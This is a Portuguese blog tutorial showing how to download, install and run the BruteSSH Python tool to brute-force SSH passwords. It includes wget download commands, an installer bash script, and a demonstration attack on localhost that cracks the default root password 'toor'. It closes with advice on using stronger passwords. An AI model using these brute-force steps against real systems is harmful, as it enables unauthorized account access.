Introdução
BruteSSH é um script feito em python que é capaz de fazer brute-force no serviço SSH. Para uma simples demo, irei realizar o ataque em minha própria máquina (127.0.0.1)
Instalando o BruteSSH
Abra o terminal e faça o download do arquivo pelo comandos a seguir:
|
1
|
root@bt:~# wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 |
Agora vamos decompactar o arquivo:
|
1
|
root@bt:~# tar -jxvf brutessh-0.5.tar.bz2 |
Depois basta entrar no diretório
|
1
2
|
root@bt:~# cd brutesshroot@bt:~/brutessh# |
Agora é só rodar o script feito em python (py):
|
1
|
root@bt:~/brutessh# python brutessh.py |
Se você observar, os parâmetros são bem simples. Vamos lá mostrar alguns.
|
1
2
3
|
-h: Host destino-u: Usuário-d: Arquivo de senha |
Ps: Criei um script capaz de instalar o BruteSSH automaticamente.
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
#!/bin/bash# Por Jarlley Ribeiro - 0fx66clearecho " [ Brute install ]"echo " [ 0fx66 - www.0fx66.blogspot.com ]"echo ""echo " [*] Downloadind BruteSSH. Please Wait..."wget http://www.edge-security.com/soft/brutessh-0.5.tar.bz2 1> /dev/null 2> /dev/stdoutecho " [*] Unpacking Brutessh. Please Wait..."tar -jxvf brutessh-0.5.tar.bz2 1> /dev/null 2> /dev/stdoutecho " [*] OK!"echo " [*] To run, use: python brutessh.py"echo " Exiting.." |
Agora basta você da as permissões necessárias (x = execução) para executar o script.
|
1
|
root@bt:~/aaa# chmod +x brutessh_Install.sh |
Ataque!
Uso o serviço SSH do BackTrack com login e senha padrão (root e toor), então vou criar uma pequena world list com a senha correspondente.
Agora vamos disparar o ataque usando a seguinte sintaxe:
|
1
|
root@bt:~/brutessh# python brutessh.py -h 127.0.0.1 -u root -d password |
Onde os parâmetros foram explicados acima. O resultado foi:
No campo “Password Found”, ele exibe a senha quebrada (toor).
Finalizando
Com uma ótima word list e paciência, você pode rapidamente conseguir acesso ao sistema por ssh, para se proteger, evite usar senhas de fáceis caracteres (toor, 123, 321) e mude sua senha regulamente.
Fonte:INW
Mundo Tecnológico 